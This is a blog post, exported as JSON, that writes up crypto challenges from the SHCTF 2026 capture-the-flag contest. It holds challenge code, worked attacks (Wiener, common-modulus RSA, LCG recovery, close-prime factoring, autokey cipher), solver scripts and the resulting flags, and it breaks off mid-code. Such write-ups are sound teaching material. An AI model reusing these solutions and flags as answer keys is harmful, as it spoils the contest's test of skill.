{"id":2748,"date":"2026-02-20T00:17:15","date_gmt":"2026-02-19T16:17:15","guid":{"rendered":"https:\/\/www.sanjiuctf.com\/?p=2748"},"modified":"2026-02-20T00:24:48","modified_gmt":"2026-02-19T16:24:48","slug":"2026%e7%ac%ac%e4%b8%89%e5%b1%8ashctf-wp-%e7%a4%be%e4%bc%9a%e8%b5%9b%e9%81%93","status":"publish","type":"post","link":"https:\/\/www.sanjiuctf.com\/?p=2748","title":{"rendered":"2026\u7b2c\u4e09\u5c4aSHCTF wp \u793e\u4f1a\u8d5b\u9053"},"content":{"rendered":"\n

\u524d\u8a00<\/h1>\n\n\n\n

\u8fd8\u884c\u5c31\u662f\u5728\u5feb\u6625\u8282\u5907\u5e74\u8d27\u7684\u65f6\u95f4\u6bb5\uff0c\u4e00\u76f4\u6709\u4e8b\uff0c\u6ca1\u6709\u4ec0\u4e48\u65f6\u95f4\u5199\u548c\u505a\uff0cwp\u8fd8\u8981\u52a0\u73ed\u5199\uff0c\u7d2f\u6b7b\u4e86 osint \u5168\u662f\u6211\u7684\u4e16\u754c \u8fd9\u4e2a\u9898\u76ee\u51fa\u7684\u975e\u5e38\u4e0d\u597d<\/p>\n\n\n\n

\u793e\u4f1a\u8d5b\u9053: \u961f\u4f0d\u540d\u5b57:\u53c1\u53c1\u7396\u7396<\/strong>\uff0c\u7b2c8\u540d \u62ff\u4e868\u4e2a\u8840<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6bd4\u8d5b\u7b80\u4ecb<\/p>\n\n\n\n

\u4e3a\u54cd\u5e94\u56fd\u5bb6\u9ad8\u5ea6\u5173\u6ce8\u7f51\u7edc\u5b89\u5168\u3001\u505a\u597d\u7f51\u7edc\u5b89\u5168\u5de5\u4f5c\u7684\u6307\u793a\uff0c\u52a9\u529b\u63d0\u5347\u56fd\u6c11\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\u548c\u80fd\u529b\uff0cSHCTF-\"\u5c71\u6cb3\"\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u6311\u6218\u8d5b\u7ec4\u59d4\u4f1a\u51b3\u5b9a\u4e3e\u529e\u7b2c\u4e09\u5c4a\u5927\u8d5b\u3002\n\u672c\u5c4a\u5927\u8d5b\u662f\u7531\u897f\u5b89\u90ae\u7535\u5927\u5b66\u3001\u9f50\u9c81\u5de5\u4e1a\u5927\u5b66\uff08\u5c71\u4e1c\u7701\u79d1\u5b66\u9662\uff09\u3001\u957f\u6625\u5de5\u7a0b\u5b66\u9662\u3001\u957f\u6625\u7406\u5de5\u5927\u5b66\u3001\u54c8\u5c14\u6ee8\u5de5\u4e1a\u5927\u5b66\uff08\u5a01\u6d77\uff09\u3001\u83cf\u6cfd\u5b66\u9662 \u3001\u6e56\u5357\u8b66\u5bdf\u5b66\u9662\u3001\u95fd\u6c5f\u5e08\u8303\u9ad8\u7b49\u4e13\u79d1\u5b66\u6821\u3001\u7f57\u5b9a\u804c\u4e1a\u6280\u672f\u5b66\u9662\u3001\u897f\u5b89\u5de5\u4e1a\u5927\u5b66\u3001\u4e91\u5357\u5927\u5b66\u3001\u6d59\u6c5f\u5927\u5b66\u3001\u73e0\u6d77\u79d1\u6280\u5b66\u9662\u3001\u8d63\u897f\u79d1\u6280\u804c\u4e1a\u5b66\u9662\u3001\u676d\u5dde\u7535\u5b50\u79d1\u6280\u5927\u5b66\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u3001\u6e56\u5357\u4eba\u6587\u79d1\u6280\u5b66\u9662\u3001\u6dee\u5357\u8054\u5408\u5927\u5b66\u3001\u5c71\u4e1c\u5546\u4e1a\u804c\u4e1a\u6280\u672f\u5b66\u9662\u3001\u5c71\u4e1c\u534f\u548c\u5b66\u9662\u3001\u4e09\u4e9a\u5b66\u9662\u3001\u6df1\u5733\u804c\u4e1a\u6280\u672f\u5927\u5b66\u3001\u68a7\u5dde\u5b66\u9662\u3001\u897f\u5317\u5e08\u8303\u5927\u5b66\u3001\u76d0\u57ce\u5de5\u5b66\u9662\u3001\u90d1\u5dde\u5546\u5b66\u9662\u3001\u4e2d\u56fd\u79d1\u5b66\u6280\u672f\u5927\u5b66(\u6392\u540d\u4e0d\u5206\u5148\u540e)\u7b49\u4e8c\u5341\u4f59\u6240\u9ad8\u6821\u5171\u540c\u4e3e\u529e\u7684\u300cCTF Capture The Flag\u300d\u9ad8\u6821\u8054\u8d5b\uff0c\u6bd4\u8d5b\u6301\u7eed\u4e00\u5468\uff0c\u5206\u4e24\u6b21\u9010\u6b65\u653e\u9898\uff0c\u6bd4\u8d5b\u91c7\u7528 \u300cJeopardy \u89e3\u9898\u6a21\u5f0f \u300d\u6db5\u76d6Web\u3001Pwn\u3001Reverse\u3001Misc\u3001Crypto\u7b49CTF\u5e38\u89c1\u8d5b\u9898\u65b9\u5411\u3002\n\u5927\u8d5b\u53c2\u8d5b\u5f62\u5f0f\u4e3a\u4e2a\u4eba\u8d5b\uff0c\u9762\u5411\u5168\u4f53\u7f51\u7edc\u5b89\u5168\u7231\u597d\u8005\uff0c\u5728\u8bbe\u7f6e\u516c\u5f00\u8d5b\u9053\u7684\u540c\u65f6\u4e3a\u5404\u8054\u5408\u9ad8\u6821\u5355\u4f4d\u5f00\u653e\u6821\u5185\u8d5b\u9053\uff0c\u6b22\u8fce\u793e\u4f1a\u5404\u754c\u7f51\u7edc\u5b89\u5168\u7231\u597d\u8005\u7684\u79ef\u6781\u53c2\u4e0e\u3002\n\u534f\u529e\u5355\u4f4d\uff1a\u5c71\u4e1c\u6c49\u4efb\u4fe1\u606f\u5b89\u5168\u6280\u672f\u6709\u9650\u516c\u53f8\uff0c\u70fd\u58e4\u4fe1\u606f\u79d1\u6280\uff08\u7518\u8083\uff09\u6709\u9650\u8d23\u4efb\u516c\u53f8\uff0c\u5c71\u4e1c\u9e4f\u4e91\u4fe1\u606f\u79d1\u6280\u6709\u9650\u516c\u53f8\n\u6bd4\u8d5b\u5730\u5740\uff1ahttps:\/\/shc.tf\/\n\u6bd4\u8d5b\u65f6\u95f4\uff1a2026-2-2 \u81f3 2026-2-8\n\u6821\u5185\u8d5b\u9053\u62a5\u540d\u9080\u8bf7\u7801\u8bf7\u54a8\u8be2\u5bf9\u5e94\u9ad8\u6821\u8d1f\u8d23\u4eba\u83b7\u53d6<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Crypto(\u5168\u89e3)<\/h1>\n\n\n\n
\u7b2c\u4e00\u9636\u6bb5<\/h2>\n\n\n\n
Ez_RSA<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
100252_chall.py<\/p>\n\n\n\n
from Crypto.Util.number import getPrime,bytes_to_long\nfrom gmpy2 import invert\nfrom secret import flag\n\nm = bytes_to_long(flag)\n\np = getPrime(512)\nq = getPrime(512)\nn = p*q\nphi = (p-1) * (q-1)\ne = getPrime(1019)\nd = invert(e, phi)\n\nc = pow(m,e,n)\n\"\"\"\nn = 107464134871680646151655304067173578951022679613817744422854142736895193478923970402314237869266898585661396817719803005109183572552933963881756199330890085692291647461683934019264121186823772581796061998307778635680038707808422026396560620912393186072263186503236380890048319797143644270579169484448179083299\ne = 3924586561728843234261049280560557566669922961436496251423249382498887294225142535297862819865029081145630384268177735578769958711287734205364353929040337350836000661255957087233897675207507752217828489549059197109918195953230752720210793300168746820366115929509596904295875481061789801178045962611893883689\nc = 4557192604704814579224198928010541193712311907197292139423304635523945088581321950910727673367241811197226152299201713883344661436550024661781925551129803469824570154317098612833694631836257698682075695287756551674264966935203485636255394639674521955953445322493019052791894426980946209383266707043869522774\n\"\"\"<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6\u5206\u6790<\/strong> \u9898\u76ee\u7ed9\u51fa\u7684\u662f\u6807\u51c6 RSA \u52a0\u5bc6
$$
c equiv m^e pmod n
$$
\u89c2\u5bdf\u53c2\u6570\u53d1\u73b0\u516c\u94a5\u6307\u6570 e \u975e\u5e38\u5927\uff08\u4e0e N \u540c\u91cf\u7ea7\uff09\uff0c\u8fd9\u662f\u7ef4\u7eb3\u653b\u51fb\u7684\u5178\u578b\u7279\u5f81\u3002
$$
\u5f53 d < frac{1}{3}N^{1\/4} \u65f6\uff0c\u53ef\u4ee5\u901a\u8fc7 e\/N \u7684\u8fde\u5206\u6570\u5c55\u5f00\u8ba1\u7b97\u6e10\u8fdb\u5206\u6570\u6765\u6062\u590d\u79c1\u94a5 d\u3002
$$
\u89e3\u5bc6\u601d\u8def
$$
\u8ba1\u7b97 e\/N \u7684\u8fde\u5206\u6570\u5c55\u5f00\u3002
$$<\/p>\n\n\n\n
$$
\u751f\u6210\u6e10\u8fdb\u5206\u6570 k\/d\u3002
$$<\/p>\n\n\n\n
$$
\u904d\u5386\u6bcf\u4e2a\u5206\u6bcd d\u4f5c\u4e3a\u79c1\u94a5\u5019\u9009\u503c\uff0c\u9a8c\u8bc1 phi(n) \u662f\u5426\u80fd\u5bfc\u51fa\u6574\u6570\u89e3\u3002
$$<\/p>\n\n\n\n
$$
\u5229\u7528\u6b63\u786e\u7684 d \u8ba1\u7b97 m equiv c^d pmod n \u5f97\u5230 flag\u3002
$$<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import sys\nimport math\nfrom Crypto.Util.number import long_to_bytes\n\nsys.set_int_max_str_digits(10000)\n\nn = 107464134871680646151655304067173578951022679613817744422854142736895193478923970402314237869266898585661396817719803005109183572552933963881756199330890085692291647461683934019264121186823772581796061998307778635680038707808422026396560620912393186072263186503236380890048319797143644270579169484448179083299\ne = 3924586561728843234261049280560557566669922961436496251423249382498887294225142535297862819865029081145630384268177735578769958711287734205364353929040337350836000661255957087233897675207507752217828489549059197109918195953230752720210793300168746820366115929509596904295875481061789801178045962611893883689\nc = 4557192604704814579224198928010541193712311907197292139423304635523945088581321950910727673367241811197226152299201713883344661436550024661781925551129803469824570154317098612833694631836257698682075695287756551674264966935203485636255394639674521955953445322493019052791894426980946209383266707043869522774\n\ndef continued_fractions(n, d):\n    while d:\n        q = n \/\/ d\n        yield q\n        n, d = d, n % d\n\ndef convergents(cf):\n    n0, d0 = 0, 1\n    n1, d1 = 1, 0\n    for q in cf:\n        n2, d2 = q * n1 + n0, q * d1 + d0\n        yield n2, d2\n        n0, d0 = n1, d1\n        n1, d1 = n2, d2\n\ndef solve():\n    cf = continued_fractions(e, n)\n    convs = convergents(cf)\n\n    for k, d in convs:\n        if k == 0: continue\n\n        if (e * d - 1) % k != 0:\n            continue\n\n        phi = (e * d - 1) \/\/ k\n        b = n - phi + 1\n        delta = b*b - 4*n\n\n        if delta >= 0:\n            sqrt_delta = math.isqrt(delta)\n            if sqrt_delta * sqrt_delta == delta:\n                m = pow(c, d, n)\n                try:\n                    print(long_to_bytes(m).decode())\n                    return\n                except:\n                    continue\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{e950ea87356fc62ce6323253a672680e}<\/code><\/pre>\n\n\n\n
TE<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
task.py<\/p>\n\n\n\n
from Crypto.Util.number import *\nimport random\nfrom secret import flag\n\np, q = getPrime(512), getPrime(512)\nn = p * q\n\ne1 = random.getrandbits(32)\ne2 = random.getrandbits(32)\n\nprint(f'{e1 = }')\nprint(f'{e2 = }')\n\nm = bytes_to_long(flag)\nc1 = pow(m, e1, n)\nc2 = pow(m, e2, n)\n\nprint(f'{n = }')\nprint(f'{c1 = }')\nprint(f'{c2 = }')\n\n'''\ne1 = 740153575\ne2 = 2865243571\nn = 136622832042809215646904518487100682818433235485047740604612449039291802103378650845690420527029208661555957840623544220907967041438993189882681277161437473818861280518627112617436473837014181944318974950710633690704711613682306786783611123590732850783007770603201513394002330426718261667816328404673167404897\nc1 = 56187319559060690757544481076112948328826527679002578544683022765347668056620384831778729489197135280950314627119815558644487151419126272267146826463912815062442590228193753706779325992179790583792001196548329204758137104234662611732735693150331594645734142941475121453410494160975503459516324097097434727685\nc2 = 45042409947237296641429229414329516753664139389113206575966507524195434716702812078844474626406932213486611190698953613898299571473488550533642524208077653917354039305279692307471529748408234617430389423630015569730564585740596832844917494965974840512412454337766930330443409183293514761911902752336129193323\n'''<\/code><\/pre>\n\n\n\n
\u9898\u76ee\u5206\u6790<\/p>\n\n\n\n
\u9898\u76ee\u7ed9\u51fa\u4e86 RSA \u52a0\u5bc6\u573a\u666f\uff1a<\/p>\n\n\n\n
\u52a0\u5bc6\u65b9\u5f0f<\/strong>\uff1a\u4f7f\u7528\u76f8\u540c\u7684\u6a21\u6570 n \u548c\u76f8\u540c\u7684\u660e\u6587 m\u3002
$$
\u53d8\u91cf\uff1a\u4f7f\u7528\u4e86\u4e24\u4e2a\u4e0d\u540c\u7684\u516c\u94a5\u6307\u6570 e_1 \u548c e_2\uff0c\u5206\u522b\u751f\u6210\u5bc6\u6587 c_1 \u548c c_2\u3002
$$<\/p>\n\n\n\n
\u6f0f\u6d1e<\/strong>\uff1a RSA \u5171\u6a21\u653b\u51fb<\/strong><\/p>\n\n\n\n
\u89e3\u5bc6\u903b\u8f91
$$
\u5f53 gcd(e_1, e_2) = 1 \u65f6\uff0c\u6839\u636e\u8d1d\u7956\u5b9a\u7406\uff0c\u5b58\u5728\u6574\u6570 s_1, s_2 \u4f7f\u5f97\uff1as_1 e_1 + s_2 e_2 = 1
$$<\/p>\n\n\n\n
$$
\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6269\u5c55\u6b27\u51e0\u91cc\u5f97\u7b97\u6cd5\u6c42\u51fas_1\u548cs_2\uff0c\u7136\u540e\u901a\u8fc7\u4ee5\u4e0b\u516c\u5f0f\u76f4\u63a5\u6062\u590d\u660e\u6587m:m equiv c_1^{s_1} times c_2^{s_2} pmod n
$$
exp.py<\/p>\n\n\n\n
from Crypto.Util.number import long_to_bytes\n\nn = 136622832042809215646904518487100682818433235485047740604612449039291802103378650845690420527029208661555957840623544220907967041438993189882681277161437473818861280518627112617436473837014181944318974950710633690704711613682306786783611123590732850783007770603201513394002330426718261667816328404673167404897\ne1 = 740153575\ne2 = 2865243571\nc1 = 56187319559060690757544481076112948328826527679002578544683022765347668056620384831778729489197135280950314627119815558644487151419126272267146826463912815062442590228193753706779325992179790583792001196548329204758137104234662611732735693150331594645734142941475121453410494160975503459516324097097434727685\nc2 = 45042409947237296641429229414329516753664139389113206575966507524195434716702812078844474626406932213486611190698953613898299571473488550533642524208077653917354039305279692307471529748408234617430389423630015569730564585740596832844917494965974840512412454337766930330443409183293514761911902752336129193323\n\ndef egcd(a, b):\n    if a == 0:\n        return (b, 0, 1)\n    else:\n        g, y, x = egcd(b % a, a)\n        return (g, x - (b \/\/ a) * y, y)\n\ng, s1, s2 = egcd(e1, e2)\n\nm = (pow(c1, s1, n) * pow(c2, s2, n)) % n\n\nprint(long_to_bytes(m).decode())<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{lYQkkk3ud4hqV3fZtPWH077vhI2Bqcz19ZRxf1vwRU8Ej4uvrJcF02Sd4bzjxqUH5096qWDIdTyEJ$JzF}<\/code><\/pre>\n\n\n\n
Stream<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u5206\u6790<\/p>\n\n\n\n
\u9898\u76ee\u4f7f\u7528\u7ebf\u6027\u540c\u4f59\u751f\u6210\u5668 (LCG) \u751f\u6210\u5bc6\u94a5\u6d41\u5bf9\u660e\u6587\u8fdb\u884c\u5f02\u6216\u52a0\u5bc6\u3002 \u63d0\u4f9b\u4e86\u5df2\u77e5\u660e\u6587 P_known<\/code> \u53ca\u5176\u5bf9\u5e94\u7684\u5bc6\u6587 C_known<\/code>\uff0c\u4ee5\u53ca Flag \u7684\u5bc6\u6587 C_flag<\/code>\u3002
$$
\u63d0\u53d6\u72b6\u6001\uff1a\u5229\u7528\u5df2\u77e5\u660e\u6587\u548c\u5bc6\u6587\uff0c\u901a\u8fc7 S_i = P_i oplus C_i \u6062\u590d\u51fa\u8fde\u7eed\u7684 6 \u4e2a LCG \u968f\u673a\u6570\u72b6\u6001\u3002
$$<\/p>\n\n\n\n
\u653b\u51fb LCG<\/strong>\uff1a
$$
\u6c42\u6a21\u6570 m\uff1a\u5229\u7528\u884c\u5217\u5f0f\u6027\u8d28 Un = T<\/em>{n+2}Tn – T<\/em>{n+1}^2 (\u5176\u4e2d Tn = S<\/em>{n+1}-S_n)\uff0c\u8ba1\u7b97\u591a\u4e2a U_n \u7684\u6700\u5927\u516c\u7ea6\u6570\u5f97\u5230 m\u3002
$$<\/p>\n\n\n\n
$$
\u6c42\u53c2\u6570 a, c\uff1a\u6784\u5efa\u7ebf\u6027\u65b9\u7a0b\u7ec4\u6c42\u89e3\uff0ca = T_{n+1} cdot Tn^{-1} pmod m\uff0cc = S<\/em>{n+1} – a cdot S_n pmod m\u3002
$$<\/p>\n\n\n\n
\u89e3\u5bc6<\/strong>\uff1a\u5229\u7528\u6062\u590d\u7684\u53c2\u6570\u751f\u6210\u5269\u4f59\u5bc6\u94a5\u6d41\uff0c\u5f02\u6216 C_flag<\/code> \u5f97\u5230 flag\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
def inverse(a, m):\n    return pow(a, -1, m)\n\ndef gcd(a, b):\n    while b:\n        a, b = b, a % b\n    return a\n\ndef solve():\n    P_known = b'Insecure_linear_congruential_random_number!!!!!!'\n    C_known_hex = \"44e18dfa1acd14aa790fc3bac4ca54c137bcd47bdfc2209a53b83715ecad3e29249845720588cac007bfb94f8476d91a\"\n    C_flag_hex  = \"1995374a5b64c6696578c1d5bdc6fa3d1e974b813436eab4348db801fb7a6703658eaa4fefa2c6fd6792beb969df8ca70ad87a4f4aea6ca0040d65a3c1e3a5bf2655cafc1e5603a171edc9aa077c0ca264677c351907f35756c14dd7ece428cb424a3804b544ccb53e99935f9bc2d8483dd7587379c99b3542c222008a\"\n\n    full_cipher = bytes.fromhex(C_known_hex + C_flag_hex)\n    S = []\n    for i in range(0, len(P_known), 8):\n        p_block = int.from_bytes(P_known[i:i+8], 'big')\n        c_block = int.from_bytes(full_cipher[i:i+8], 'big')\n        S.append(p_block ^ c_block)\n\n    T = [S[i+1] - S[i] for i in range(len(S)-1)]\n    U = [T[i+2] * T[i] - T[i+1]**2 for i in range(len(T)-2)]\n\n    m = abs(U[0])\n    for val in U[1:]:\n        m = gcd(m, abs(val))\n\n    a = (T[1] * inverse(T[0], m)) % m\n    c = (S[1] - a * S[0]) % m\n\n    print(f\"m = {m}na = {a}nc = {c}\")\n\n    remaining_bytes = len(full_cipher) - len(P_known)\n    remaining_blocks = (remaining_bytes + 7) \/\/ 8\n\n    keystream = []\n    curr = S[-1]\n\n    for _ in range(remaining_blocks):\n        curr = (a * curr + c) % m\n        keystream.append(curr)\n\n    decrypted_bytes = b''\n    cipher_flag_part = full_cipher[len(P_known):]\n\n    for i in range(len(keystream)):\n        chunk = cipher_flag_part[i*8 : (i+1)*8]\n        if len(chunk) < 8:\n            chunk += b'x00' * (8 - len(chunk))\n\n        c_val = int.from_bytes(chunk, 'big')\n        k_val = keystream[i]\n\n        p_val = c_val ^ k_val\n        decrypted_bytes += p_val.to_bytes(8, 'big')\n\n    flag_raw = decrypted_bytes.decode('utf-8', errors='ignore')\n    if '}' in flag_raw:\n        print(flag_raw.split('}')[0] + '}')\n    else:\n        print(flag_raw)\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{LLLLLLLLLLLLLLLCCCCCGGGGGGGGG_TGY%JgWOmAM6V5n55w3m*jcPJZjHO8E1VvzrGjT84tXS332D&o4GZe8%KKzEyAngmwwx9bp5dv_O4dPpOvMy1^hM}<\/code><\/pre>\n\n\n\n
not_eight_length<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
task.py<\/p>\n\n\n\n
from Crypto.Util.number import *\nfrom sympy import *\nfrom secret import encrypted_flag\n\nm = bytes_to_long(encrypted_flag)\np = getPrime(512)\ntemp = nextprime(p)\nq = nextprime(temp)\nn = p * q\ne = 65537\nc = pow(m, e, n)\n\nprint(f'n = {n}')\nprint(f'e = {e}')\nprint(f'c = {c}')\n\n# n = 172113078605688993167549425692325605693719693815361211139292482064751327114103720980024048929660587708361336638391782482562146750015275689746844657810313957504514376746631004470588767450715447808496931019899675426647981223953742448155335425954936981689508246039354976739386690722681509534696120714425567962527\n# e = 65537\n# c = 47611886444337000128826989676221463775339201602510220886566675518701473035795983698414894648685567473325732994652173596155832091773084566434572294009136327143103984205257862772844337876748271318723897875683699389776414143689503392203746843332334862282735760778003407162335426111769147991087343730761557771446\n<\/code><\/pre>\n\n\n\n
\u9898\u76ee\u5206\u6790<\/p>\n\n\n\n
\u52a0\u5bc6\u7b97\u6cd5<\/strong>\uff1aRSA\u3002
$$
\u6f0f\u6d1e\u70b9\uff1a\u9898\u76ee\u751f\u6210\u903b\u8f91\u4e3a p = getPrime(512), q = nextprime(nextprime(p))\u3002
$$<\/p>\n\n\n\n
$$
\u7531\u4e8e p \u548c q \u662f\u6781\u5176\u63a5\u8fd1\u7684\u7d20\u6570\uff0c\u5bfc\u81f4 n = pq approx p^2\u3002\u53ef\u4ee5\u901a\u8fc7\u8d39\u9a6c\u5206\u89e3\u6cd5\u7684\u7b80\u5316\u7248\uff0c\u76f4\u63a5\u5bf9 n \u5f00\u5e73\u65b9\u6839 (sqrt{n}) \u5feb\u901f\u627e\u5230 p\u3002
$$<\/p>\n\n\n\n
\u7f16\u7801\u9677\u9631<\/strong>\uff1a\u5e38\u89c4\u9898\u76ee\u4f7f\u7528 bytes_to_long<\/code> (8-bit\/byte)\uff0c\u672c\u9898\u540d\u4e3a “not_eight_length”\uff0c\u4e14\u5e38\u89c4\u89e3\u7801\u5931\u8d25\u3002\u6839\u636e ASCII \u7279\u6027\uff0c\u8fd9\u91cc\u4f7f\u7528\u7684\u662f 7-bit \u7f16\u7801\u5c06\u5b57\u7b26\u8f6c\u6362\u4e3a\u6574\u6570\u3002\u89e3\u5bc6\u540e\u7684 m \u9700\u8981\u8f6c\u4e3a\u4e8c\u8fdb\u5236\uff0c\u6bcf 7 \u4f4d\u5207\u5272\u8fd8\u539f\u4e3a\u5b57\u7b26\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import gmpy2\n\nn = 172113078605688993167549425692325605693719693815361211139292482064751327114103720980024048929660587708361336638391782482562146750015275689746844657810313957504514376746631004470588767450715447808496931019899675426647981223953742448155335425954936981689508246039354976739386690722681509534696120714425567962527\ne = 65537\nc = 47611886444337000128826989676221463775339201602510220886566675518701473035795983698414894648685567473325732994652173596155832091773084566434572294009136327143103984205257862772844337876748271318723897875683699389776414143689503392203746843332334862282735760778003407162335426111769147991087343730761557771446\n\np = gmpy2.isqrt(n)\nwhile n % p != 0:\n    p -= 1\nq = n \/\/ p\n\nphi = (p - 1) * (q - 1)\nd = gmpy2.invert(e, phi)\nm = pow(c, d, n)\n\nm_bin = bin(m)[2:]\nwhile len(m_bin) % 7 != 0:\n    m_bin = '0' + m_bin\n\nflag = ''\nfor i in range(0, len(m_bin), 7):\n    flag += chr(int(m_bin[i:i+7], 2))\n\nprint(flag)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{99f4a238-9bd5-498a-b8ea-5cd243a36a19}<\/code><\/pre>\n\n\n\n
\u53e4\u5178\u4e5f\u9887\u6709\u97f5\u5473\u554a<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5bc6\u6587\uff1abcin!guy zeui wh! wwps ce yryz ysex:wpurt{wc@xdii_u2frmt_cwkg_ktani0}\nencode_key:ABBAAABBABBAABABAABBABAAAAABBAAABAAABBAAAABAABAAAAAABAA<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6key\u57f9\u6839\u5bc6\u7801<\/p>\n\n\n\n
ABBAAABBABBAABABAABBABAAAAABBAAABAAABBAAAABAABAAAAAABAA<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
NOTVIGENERE (\u610f\u4e3a \"Not Vigen\u00e8re\")\u3002<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6\u5bc6\u6587 (\u7ef4\u5409\u5c3c\u4e9a\u81ea\u52a8\u5bc6\u94a5)<\/strong><\/p>\n\n\n\n
\u7ebf\u7d22<\/strong>\uff1a\u201c\u4e0d\u662f\u7ef4\u5409\u5c3c\u4e9a\u201d\u4f46\u201c\u6709\u5171\u540c\u70b9\u201d\uff0c\u4e14\u63d0\u5230\u201c\u7ef4\u591a\u5229\u4e9a\u201d(Victoria -> V)\uff0c\u6697\u793a Autokey Cipher (\u81ea\u52a8\u5bc6\u94a5\u5bc6\u7801)<\/strong>\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u89e3\u51fa<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
def solve():\n    bacon_cipher = \"ABBAAABBABBAABABAABBABAAAAABBAAABAAABBAAAABAABAAAAAABAA\"\n    cipher_text = \"bcin!guy zeui wh! wwps ce yryz ysex:wpurt{wc@xdii_u2frmt_cwkg_ktani0}\"\n\n    bacon_dict = {\n        'AAAAA':'a','AAAAB':'b','AAABA':'c','AAABB':'d','AABAA':'e',\n        'AABAB':'f','AABBA':'g','AABBB':'h','ABAAA':'i','ABAAB':'k',\n        'ABABA':'l','ABABB':'m','ABBAA':'n','ABBAB':'o','ABBBA':'p',\n        'ABBBB':'q','BAAAA':'r','BAAAB':'s','BAABA':'t','BAABB':'v',\n        'BABAA':'w','BABAB':'x','BABBA':'y','BABBB':'z'\n    }\n\n    primer_key = \"\"\n    for i in range(0, len(bacon_cipher), 5):\n        chunk = bacon_cipher[i:i+5]\n        if chunk in bacon_dict:\n            primer_key += bacon_dict[chunk]\n\n    print(f\"Recovered Key: {primer_key.upper()}\")\n\n    key_queue = list(primer_key)\n    plaintext = \"\"\n\n    for char in cipher_text:\n        if char.isalpha():\n            current_key_char = key_queue.pop(0)\n\n            shift = ord(current_key_char.lower()) - ord('a')\n            c_val = ord(char.lower()) - ord('a')\n\n            p_val = (c_val - shift) % 26\n            p_char = chr(p_val + ord('a'))\n\n            if char.isupper():\n                p_char = p_char.upper()\n\n            plaintext += p_char\n            key_queue.append(p_char)\n        else:\n            plaintext += char\n\n    print(f\"Decrypted Text: {plaintext}\")\n\n    start = plaintext.find(\"SHCTF{\")\n    if start != -1:\n        print(f\"Flag: {plaintext[start:]}\")\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{cl@ssic_c2ypto_also_crypt0}<\/code><\/pre>\n\n\n\n
AES\u7684\u8bde\u751f<\/strong><\/h3>\n\n\n\n
task.py<\/p>\n\n\n\n
from typing import Optional\nfrom cryptography.hazmat.primitives import padding\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nimport os, secrets, string\nfrom time import time\nfrom secret import flag\n\nflag = b'SHCTF{This_1s_@_FaK3_flag}'\n\ndef get_seed() -> Optional[bytes]:\n    length = len((f\"{int(time() * 10 ** 6)}\" * 2).encode(\"utf-8\"))\n    if (length == 32) :\n        return (f\"{int(time() * 10 ** 6)}\" * 2).encode(\"utf-8\")\n\ndef oracle(chunk: str, cipher: Cipher, pkcs7_padding: padding.PKCS7) -> str:\n    padder = pkcs7_padding.padder()\n    padded = padder.update(chunk.encode(\"utf-8\")) + padder.finalize()\n    encryptor = cipher.encryptor()\n    return (encryptor.update(padded) + encryptor.finalize()).hex()\n\ndef chunk(data: bytes, group_size: int = 7, random_fill: bool = True) -> list[str]:\n    val = int.from_bytes(data, \"big\")\n    bin_str = format(val, \"b\")\n    alphabet = string.digits + string.ascii_letters\n    groups: list[str] = []\n    for i in range(0, len(bin_str), group_size):\n        g = bin_str[i : i + group_size]\n        if len(g) < group_size:\n            if random_fill:\n                fill = ''.join(secrets.choice(alphabet) for _ in range(group_size - len(g)))\n            else:\n                fill = '0' * (group_size - len(g))\n            g = g + fill\n        groups.append(g)\n    return groups\n\ndef main() -> None:\n    key = get_seed()\n    groups = chunk(flag, group_size=7, random_fill=True)\n    iv = os.urandom(16)\n    aes_cipher = Cipher(algorithms.AES(key), modes.CBC(iv))\n    pkcs7 = padding.PKCS7(algorithms.AES.block_size)\n    ciphertexts = [oracle(g, aes_cipher, pkcs7) for g in groups]\n    out_lines: list[str] = []\n    def log(*parts):\n        line = ' '.join(str(p) for p in parts)\n        out_lines.append(line)\n        print(line)\n    log('iv =', iv.hex())\n    log('\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014')\n    for ct in ciphertexts:\n        log(('|'),ct,('|'))\n    log('\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014')\n\n    data_path = os.path.join(os.path.dirname(__file__), 'data.txt')\n    with open(data_path, 'w', encoding='utf-8') as 